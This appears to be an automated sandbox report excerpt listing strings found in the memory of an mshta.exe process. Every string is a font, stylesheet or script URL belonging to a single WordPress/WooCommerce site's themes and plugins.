Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFV0UzdYPFkaVN.woff)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFVUUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIone;
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E0B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7C:
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7S
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E0B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7d
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tra
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.73.
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7=
Source: mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7C:
Source: mshta.exe, 00000004.00000002.3290590957.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.0000013470411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7j
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7m
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7%s
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7.js
Source: mshta.exe, 00000004.00000003.2283680885.000001347071E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291456573.000001347071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.70
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.73.1
Source: mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.77-trac
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7_
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7er=2.3
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7o
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3
Source: mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.
Source: mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8A
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8f
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2
Source: mshta.exe, 00000004.00000003.2148849104.00000134703A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2-
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2.wooco
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2:
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2C:
Source: mshta.exe, 00000004.00000002.3290475443.0000013470330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2F
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2contai
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2ht:
Source: mshta.exe, 00000004.00000002.3290475443.0000013470330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2s
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2yment_
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2
Source: mshta.exe, 00000004.00000002.3290590957.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.0000013470411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2&
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.21.3.
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2C:
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2e
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2g
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2r
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2th:
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/js/by_author.js?ve
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.cs
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/js/by_instock.js?
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.cs
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?
Source: mshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/
Source: mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css
Source: mshta.exe, 00000004.00000002.3291040038.0000013470542000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/img/ajax-load
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?v
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?v
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/front_builder/css/front-buil
Source: mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.c
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_searc
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/sections/css/sections.css?ve
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/sections/js/sections.js?ver=
Source: mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/js/html_t
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/jquery.tabSlide
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?ve
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideO
